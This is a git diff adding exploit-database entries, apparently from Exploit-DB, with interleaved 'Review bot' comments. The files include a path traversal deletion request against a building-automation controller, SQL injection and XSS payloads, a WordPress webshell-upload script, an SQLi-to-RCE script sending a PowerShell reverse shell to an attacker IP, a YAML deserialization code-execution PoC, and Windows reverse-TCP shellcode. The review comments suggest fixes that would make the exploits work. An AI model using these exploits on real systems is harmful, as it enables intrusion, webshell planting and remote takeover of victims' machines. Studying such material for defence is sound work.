It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET +parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause +denial of service scenario. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5680 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php + + +25.06.2021 + +-- + + +Arbitrary File Deletion +----------------------- + +- Attacker can delete any file by abusing 'cfile' GET parameter in fmanerdel applet and using traversal sequence. + + +Request: + +GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1 \ No newline at end of file 
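Review bot: the PoC `GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1` has no `Host` header (mandatory in HTTP/1.1) and no response, so nothing in the hunk shows that the deletion actually took place; the text also calls fmanerdel an "applet" in the bullet while the Desc refers to a GET parameter. Add the `Host` header, use a harmless target the tester created beforehand with a before/after listing or the server response, and state whether the request needs a session cookie, since the bullet only says "Attacker can delete any file".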
diff --git a/exploits/php/webapps/50274.txt b/exploits/php/webapps/50274.txt new file mode 100644 index 000000000..7cb1d5767 --- /dev/null +++ b/exploits/php/webapps/50274.txt @@ -0,0 +1,30 @@ +# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities +# Date: 2021-09-09 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql +# Version: 1.0 +# Tested on: Windows 10 - XAMPP Server + +# Vulnerable page : +http://localhost/msms/admin/edit-customer-detailed.php?editid= + +# Proof Of Concept : +# 1 . Download And install [ Men Salon Management System ] +# 2 . Go to /msms/admin/index.php and Enter Username & Password +# 3 . Navigate to >> Customer List +# 4 . In the action column, click Edit +# 5 . Enter the payload into the Url and Fields + +# [ Sql Injection ] : + +Vulnerable paramater : +The editid paramater is Vulnerable to sqli + +GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+ + +# [ Stored Cross-Site Scripting ] : + +Vulnerable Fields : Name & Email + +Payload Used: "> \ No newline at end of file diff --git a/exploits/php/webapps/50287.py b/exploits/php/webapps/50287.py new file mode 100755 index 000000000..b62111e76 --- /dev/null +++ b/exploits/php/webapps/50287.py 
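Review bot: in exploits/php/webapps/50274.txt the stored XSS section ends with `Payload Used: ">` and nothing after it, so the payload is incomplete as published; the tag that follows the `">` attribute break-out has to be restored or the finding cannot be reproduced. Both findings also require logging in at `/msms/admin/index.php` first (step 2 of the PoC), so the title and the SQLi line should say authenticated/admin, and the `editid=2'+union+select+1,database(),3,4,5,6,7,8--+` payload would benefit from a line saying which column is reflected in the page.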
@@ -0,0 +1,75 @@ +# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload +# Google Dork: inurl:/wp-content/plugins/download-from-files +# Date: 10/09/2021 +# Exploit Author: spacehen +# Vendor Homepage: https://wordpress.org/plugins/download-from-files/ +# Version: <= 1.48 +# Tested on: Ubuntu 20.04.1 LTS (x86) + +import os.path +from os import path +import json +import requests; +import sys + +def print_banner(): + print("Download From Files <= 1.48 - Arbitrary File Upload") + print("Author -> spacehen (www.github.com/spacehen)") + +def print_usage(): + print("Usage: python3 exploit.py [target url] [php file]") + print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") + +def vuln_check(uri): + response = requests.get(uri) + raw = response.text + + if ("Sikeres" in raw): + return True; + else: + return False; + +def main(): + + print_banner() + if(len(sys.argv) != 3): + print_usage(); + sys.exit(1); + + base = sys.argv[1] + file_path = sys.argv[2] + + ajax_action = 'download_from_files_617_fileupload' + admin = '/wp-admin/admin-ajax.php'; + + uri = base + admin + '?action=' + ajax_action ; + check = vuln_check(uri); + + if(check == False): + print("(*) Target not vulnerable!"); + sys.exit(1) + + if( path.isfile(file_path) == False): + print("(*) Invalid file!") + sys.exit(1) + + files = {'files[]' : open(file_path)} + data = { + "allowExt" : "php4,phtml", + "filesName" : "files", + "maxSize" : "1000", + "uploadDir" : "." + } + print("Uploading Shell..."); + response = requests.post(uri, files=files, data=data ) + file_name = path.basename(file_path) + if("ok" in response.text): + print("Shell Uploaded!") + if(base[-1] != '/'): + base += '/' + print(base + "wp-admin/" + file_name); + else: + print("Shell Upload Failed") + sys.exit(1) + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/50288.py b/exploits/php/webapps/50288.py new file mode 100755 index 000000000..8844b0460 --- /dev/null 
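Review bot: in exploits/php/webapps/50287.py, `files = {'files[]' : open(file_path)}` opens the payload in text mode and never closes it; a `.php4`/`.phtml` file with non-ASCII bytes or CRLF line endings can be altered or raise a decode error on the way in. Use `with open(file_path, 'rb') as fh:` and build `files` inside the block. Two further points: `vuln_check` declares the target vulnerable on the single substring `"Sikeres"` in a GET to `admin-ajax.php?action=download_from_files_617_fileupload`, and the success test is `"ok" in response.text`; both misfire on unrelated pages, and the handler's JSON would be a more reliable signal (the script imports `json` but never uses it). Also drop the stray `;` terminators and pass `timeout=` to the `requests` calls.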
+++ b/exploits/php/webapps/50288.py 
@@ -0,0 +1,77 @@ +# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE +# Date: 2021-08-13 +# Exploit Author: mari0x00 +# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 +# Version: 1.0 +# Tested on: Windows 10 + XAMPP + +#!/usr/bin/python3 + +import requests, socket, threading +import base64, time, sys + +print(('''###########################################################''',"red")) +print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) +print(('''###########################################################''',"red")) +print("") + +URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' +path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' +path = path.replace("\\", "\\\\") +rhost = input("Provide attacker IP: ") or "127.0.0.1" +rport = input("Provide attacker listening port: ") or "1337" + + +# sending webshell +payload = {"username": "admin' union select '' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} +requests.post(URL, data=payload) + + +def shell(rhost, rport): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.bind((rhost, int(rport))) + except socket.error as msg: + print("Bind failed. 
Error Code : " + str(msg[0]) + " Message " + msg[1]) + sys.exit() + + s.settimeout(5) + s.listen(5) + print('[+] Waiting for connection..') + + conn = False + command='' + + while conn == False: + try: + conn, addr = s.accept() + print("Got a connection from " + addr[0] + ":" + str(addr[1])) + conn.send('\n'.encode()) + time.sleep(1) + print(conn.recv(0x10000).decode()) + while(command != 'exit'): + command=input('') + conn.send((command + '\n').encode()) + time.sleep(.3) + res = conn.recv(0x10000) + print(res.decode()) + s.close() + sys.exit("[!] Program exited") + except socket.timeout: + pass + + +def start_shell(rhost, rport): + revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" + revshell = revshell.encode('ascii') + revshell = base64.b64encode(revshell) + revshell = revshell.decode('ascii') + connection = requests.get(URL+"/lol.php?cmd=" + revshell) + +print("[+] Starting to listen on port " + rport) +time.sleep(0.5) +threading.Thread(target=shell, args=(rhost, rport)).start() +time.sleep(2) +print("[+] Sending the reverse shell payload") +threading.Thread(target=start_shell, args=(rhost, rport)).start() \ No newline at end of file diff --git a/exploits/python/local/50289.py b/exploits/python/local/50289.py new file mode 100755 index 000000000..00cc541e3 --- /dev/null +++ b/exploits/python/local/50289.py 
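Review bot: in exploits/php/webapps/50288.py, the SQLi payload `"admin' union select '' into outfile '" + path + "' -- 'a"` selects an empty string, so as published it writes an empty `lol.php` and the later `requests.get(URL+"/lol.php?cmd=" + revshell)` has nothing to execute; the PHP body of the webshell appears to have been dropped and must be restored, together with how that shell decodes the base64 `cmd` value. Other defects visible in the hunk: `print(('''###...''',"red"))` prints a tuple (a leftover `colored()` call whose import was removed); `except socket.error as msg: ... msg[0]` raises `TypeError` on Python 3 because exceptions are not subscriptable (use `msg.errno` and `msg.strerror`); `URL+"/lol.php"` yields `//lol.php` when `URL` ends with `/`, as the default does; and the upload `path` prompt is independent of the hardcoded `lol.php` in the request, so changing one without the other silently breaks the chain. `#!/usr/bin/python3` is also not on line 1, so it is a comment, not a shebang.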
@@ -0,0 +1,49 @@ +# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai +# Date: 2021-09-11 +# Exploit Author: Abhiram V +# Vendor Homepage: https://parl.ai/ +# Software Link: https://github.com/facebookresearch/ParlAI +# Version: < 1.1.0 +# Tested on: Linux +# CVE: CVE-2021-24040 +# References : +# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg +# | https://anon-artist.github.io/blogs/blog3.html | + +############################################################################ + +Introduction +ParlAI (pronounced “par-lay”) is a free, open-source python framework for +sharing, training and evaluating AI models on a variety of openly available +dialogue datasets. + +############################################################################ + +Vulnerability details + +############################################################################ + +Description +ParlAI was vulnerable to YAML deserialization attack caused by unsafe +loading which leads to Arbitrary Code Execution. + +Proof of Concept + +Create the following PoC file (exploit.py) + +import os +#os.system('pip3 install parlai') +from parlai.chat_service.utils import config +exploit = """!!python/object/new:type + args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] + listitems: "__import__('os').system('xcalc')" +""" +open('config.yml','w+').write(exploit) +config.parse_configuration_file('config.yml') + +Execute the python script ie, python3 exploit.py + +Impact +Code Execution + +############################################################################ \ No newline at end of file diff --git a/exploits/windows/local/50273.txt b/exploits/windows/local/50273.txt new file mode 100644 index 000000000..606c2c334 --- /dev/null +++ b/exploits/windows/local/50273.txt 
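Review bot: exploits/python/local/50289.py is a prose advisory ("Introduction", "Vulnerability details", "Impact") with the PoC embedded, not a Python file; as stored it fails to parse at the first unindented prose line, so either rename it to `.txt` or turn the prose into comments and leave only the script executable. In the PoC itself, `open('config.yml','w+').write(exploit)` relies on the file object being collected before `config.parse_configuration_file('config.yml')` reads it; `with open('config.yml', 'w') as f: f.write(exploit)` makes the flush explicit. The `xcalc` payload needs an X display, so a file-touch marker would make the code-execution proof portable. The header's `Version: < 1.1.0` and the title's `1.0.0` should also agree on which versions are affected.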
@@ -0,0 +1,28 @@ +# Exploit Title: Active WebCam 11.5 - Unquoted Service Path +# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io) +# Date: 09.09.2021 +# Software Link: https://www.techspot.com/downloads/175-active-webcam.html +# Vendor Homepage: https://www.pysoft.com/ +# Version: 11.5 +# Tested on: Windows 10 + +# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options + +# Proof of Concept: + +C:\Users\death>sc qc ACTIVEWEBCAM +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ACTIVEWEBCAM + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Active WebCam + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ +Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a909c6204..3e7584ca7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
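Review bot: the `sc qc ACTIVEWEBCAM` output shows `BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe` unquoted, `AUTO_START`, and `SERVICE_START_NAME : LocalSystem`, but the hunk never shows that a standard user can write `C:\Program.exe` or `C:\Program Files\Active.exe`, which is what turns the unquoted path into an escalation; on a default install neither `C:\` nor `C:\Program Files` is writable by standard users. Add `icacls "C:\Program Files\Active WebCam"` (and the equivalent for the parent directories) output, and a sentence that the `findstr /i /v """` filter in the wmic one-liner is there to exclude already-quoted paths.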
@@ -11385,6 +11385,9 @@ id,file,description,date,author,type,platform,port 50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, +50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, +50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware, +50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 
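Review bot: the 50283 row (`ECOA Building Automation System - Missing Encryption Of Sensitive Information`) is filed as `local,hardware` while the other ECOA entries in this patch are `webapps,hardware` or `remote,hardware`; if the finding concerns traffic to or from a network-reachable controller, `remote` is the right type. The 50289 row also describes `Facebook ParlAI 1.0.0` while the file header says `Version: < 1.1.0`; pick one.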
@@ -18528,6 +18531,7 @@ id,file,description,date,author,type,platform,port 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",1970-01-01,"Ivan Nikolsky",remote,hardware, 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",1970-01-01,"Christopher Ellis",remote,java, 50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux, +50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 
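Review bot: the 50282 row (`ECOA Building Automation System - Hard-coded Credentials SSH Access`, `remote,hardware,`) leaves the `port` column empty although the neighbouring remote rows carry one (`80`, `139`); for an SSH finding `22` should be filled in so the entry is searchable by port.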
@@ -44394,3 +44398,16 @@ id,file,description,date,author,type,platform,port 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, 50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php, 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php, +50274,exploits/php/webapps/50274.txt,"Men Salon Management System 1.0 - Multiple Vulnerabilities",1970-01-01,"Aryan Chehreghani",webapps,php, +50275,exploits/hardware/webapps/50275.txt,"ECOA Building Automation System - Weak Default Credentials",1970-01-01,Neurogenesia,webapps,hardware, +50276,exploits/hardware/webapps/50276.txt,"ECOA Building Automation System - Path Traversal Arbitrary File Upload",1970-01-01,Neurogenesia,webapps,hardware, +50277,exploits/hardware/webapps/50277.txt,"ECOA Building Automation System - Directory Traversal Content Disclosure",1970-01-01,Neurogenesia,webapps,hardware, +50278,exploits/hardware/webapps/50278.txt,"ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,Neurogenesia,webapps,hardware, +50279,exploits/hardware/webapps/50279.txt,"ECOA Building Automation System - Cookie Poisoning Authentication Bypass",1970-01-01,Neurogenesia,webapps,hardware, +50280,exploits/hardware/webapps/50280.txt,"ECOA Building Automation System - Configuration Download Information Disclosure",1970-01-01,Neurogenesia,webapps,hardware, +50281,exploits/hardware/webapps/50281.txt,"ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function",1970-01-01,Neurogenesia,webapps,hardware, +50284,exploits/hardware/webapps/50284.txt,"ECOA Building Automation System - Remote Privilege Escalation",1970-01-01,Neurogenesia,webapps,hardware, +50285,exploits/hardware/webapps/50285.txt,"ECOA Building 
Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware, +50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware, +50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, +50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b6ab0173b..5d6d1105b 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1041,3 +1041,4 @@ id,file,description,date,author,type,platform 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86 +50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c new file mode 100644 index 000000000..16f87a8c9 --- /dev/null +++ b/shellcodes/windows_x86-64/50291.c 
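Review bot: the ECOA `webapps,hardware,` rows 50275 through 50286 all leave `port` empty even though the PoCs in the same patch talk to `192.168.1.3:8080`; filling in `8080` keeps them consistent with the other web entries and searchable by port.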
@@ -0,0 +1,290 @@ +# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) +# Date: 09.12.2021 +# Author: Xenofon Vassilakopoulos +# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043 + +/* + +MIT License + +Copyright (c) 2021 Xenofon Vassilakopoulos + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. 
+ + +[BITS 32] + +global _start + +section .text + +_start: + +; Locate Kernelbase.dll address +XOR ECX, ECX ;zero out ECX +MOV EAX, FS:[ecx + 0x30] ;EAX = PEB +MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr +MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList +LODSD ;memory address of the second list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the third list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the fourth list entry structure +MOV EBX, [EAX + 0x10] ;EBX = Base address + +; Export Table +MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew +ADD EDX, EBX ;EDX = PE Header +MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table +ADD EDX, EBX ;EDX = Export table +MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table +ADD ESI, EBX ;ESI = Names table +XOR ECX, ECX ;EXC = 0 + +GetFunction : + +INC ECX; increment counter +LODSD ;Get name offset +ADD EAX, EBX ;Get function name +CMP dword [EAX], 0x50746547 ;"PteG" +JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP" +CMP dword [EAX + 0x4], 0x41636F72 ;"rocA" +JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA" +CMP dword [EAX + 0x8], 0x65726464 ;"ddre" +JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre" + +MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals +ADD ESI, EBX ;ESI = Ordinals table +MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function +DEC ECX ;Decrement the ordinal +MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table +ADD ESI, EBX ;ESI = Address table +MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset) +ADD EDX, EBX ;EDX = GetProcAddress + +; Get the Address of LoadLibraryA function +XOR ECX, ECX ;ECX = 0 +PUSH EBX ;Kernel32 base address +PUSH EDX ;GetProcAddress +PUSH ECX ;0 +PUSH 0x41797261 ;"Ayra" +PUSH 0x7262694C ;"rbiL" +PUSH 0x64616F4C ;"daoL" +PUSH ESP ;"LoadLibrary" +PUSH EBX ;Kernel32 base address +MOV ESI, EBX ;save the kernel32 address in esi for later +CALL EDX 
;GetProcAddress(LoadLibraryA) + +ADD ESP, 0xC ;pop "LoadLibraryA" +POP EDX ;EDX = 0 +PUSH EAX ;EAX = LoadLibraryA +PUSH EDX ;ECX = 0 +MOV DX, 0x6C6C ;"ll" +PUSH EDX +PUSH 0x642E3233 ;"d.23" +PUSH 0x5F327377 ;"_2sw" +PUSH ESP ;"ws2_32.dll" +CALL EAX ;LoadLibrary("ws2_32.dll") + +ADD ESP, 0x10 ;Clean stack +MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress +PUSH 0x61617075 ;"aapu" +SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa") +PUSH 0x74726174 ;"trat" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSAStartup" +PUSH EAX ;ws2_32.dll address +MOV EDI, EAX ;save ws2_32.dll to use it later +CALL EDX ;GetProcAddress(WSAStartup) + +; Call WSAStartUp +XOR EBX, EBX ;zero out ebx register +MOV BX, 0x0190 ;EAX = sizeof(struct WSAData) +SUB ESP, EBX ;allocate space for the WSAData structure +PUSH ESP ;push a pointer to WSAData structure +PUSH EBX ;Push EBX as wVersionRequested +CALL EAX ;Call WSAStartUp + +;Find the address of WSASocketA +ADD ESP, 0x10 ;Align the stack +XOR EBX, EBX ;zero out the EBX register +ADD BL, 0x4 ;add 0x4 at the lower register BL +IMUL EBX, 0x64 ;EBX = 0x190 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614174 ;"aaAt" +SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa") +PUSH 0x656b636f ;"ekco" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument +MOV EAX, EDI ;EAX now holds the ws2_32.dll address +PUSH EAX ;push the first argument of GetProcAddress +CALL EDX ;call GetProcAddress +PUSH EDI ;save the ws2_32.dll address to use it later + +;call WSASocketA +XOR ECX, ECX ;zero out ECX register +PUSH EDX ;null value for dwFlags argument +PUSH EDX ;zero value since we dont have an existing socket group +PUSH EDX ;null value for lpProtocolInfo +MOV DL, 0x6 ;IPPROTO_TCP +PUSH EDX ;set the protocol argument +INC ECX ;SOCK_STREAM(TCP) +PUSH ECX ;set the type argument +INC ECX ;AF_INET(IPv4) +PUSH ECX ;set the ddress family specification argument +CALL EAX ;call WSASocketA +XCHG EAX, ECX ;save the socket returned from WSASocketA at 
EAX to ECX in order to use it later + +;Find the address of connect +POP EDI ;load previously saved ws2_32.dll address to ECX +ADD ESP, 0x10 ;Align stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x63 ;EBX = 0x18c +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61746365 ;"atce" +SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a") +PUSH 0x6e6e6f63 ;"nnoc" +PUSH ESP ;"connect", second argument of GetProcAddress +PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress +XCHG ECX, EBP +CALL EDX ;call GetProcAddress + +;call connect +PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11 +PUSH word 0x5c11 ;port = 4444 +XOR EBX, EBX ;zero out EBX +add BL, 0x2 ;TCP protocol +PUSH word BX ;push the protocol value on the stack +MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol) +PUSH byte 16 ;the size of sockaddr - 3rd argument of connect +PUSH EDX ;push the sockaddr - 2nd argument of connect +PUSH EBP ;socket descriptor = 64 - 1st argument of connect +XCHG EBP, EDI +CALL EAX ;execute connect; + +;Find the address of CreateProcessA +ADD ESP, 0x14 ;Clean stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x62 ;EBX = 0x194 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614173 ;"aaAs" +SUB dword [ESP + 0x2], 0x6161 ;"As" +PUSH 0x7365636f ;"seco" +PUSH 0x72506574 ;"rPet" +PUSH 0x61657243 ;"aerC" +PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress +MOV EBP, ESI ;move the kernel32.dll to EBP +PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress +CALL EDX ;execute GetProcAddress +PUSH EAX ;address of CreateProcessA +LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA + +;call CreateProcessA +PUSH 0x61646d63 ;"admc" +SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a) +MOV ECX, ESP ;ecx now points to "cmd" string +XOR EDX, EDX ;zero out EDX +SUB ESP, 16 +MOV EBX, esp ;pointer for ProcessInfo + +;STARTUPINFOA struct +PUSH EDI 
;hStdError => saved socket +PUSH EDI ;hStdOutput => saved socket +PUSH EDI ;hStdInput => saved socket +PUSH EDX ;lpReserved2 => NULL +PUSH EDX ;cbReserved2 => NULL +XOR EAX, EAX ;zero out EAX register +INC EAX ;EAX => 0x00000001 +ROL EAX, 8 ;EAX => 0x00000100 +PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100 +PUSH EDX ;dwFillAttribute => NULL +PUSH EDX ;dwYCountChars => NULL +PUSH EDX ;dwXCountChars => NULL +PUSH EDX ;dwYSize => NULL +PUSH EDX ;dwXSize => NULL +PUSH EDX ;dwY => NULL +PUSH EDX ;dwX => NULL +PUSH EDX ;pTitle => NULL +PUSH EDX ;pDesktop => NULL +PUSH EDX ;pReserved => NULL +XOR EAX, EAX ;zero out EAX +ADD AL, 44 ;cb => 0x44 (size of struct) +PUSH EAX ;eax points to STARTUPINFOA + +;ProcessInfo struct +MOV EAX, ESP ;pStartupInfo +PUSH EBX ;pProcessInfo +PUSH EAX ;pStartupInfo +PUSH EDX ;CurrentDirectory => NULL +PUSH EDX ;pEnvironment => NULL +PUSH EDX ;CreationFlags => 0 +XOR EAX, EAX ;zero out EAX register +INC EAX ;EAX => 0x00000001 +PUSH EAX ;InheritHandles => TRUE => 1 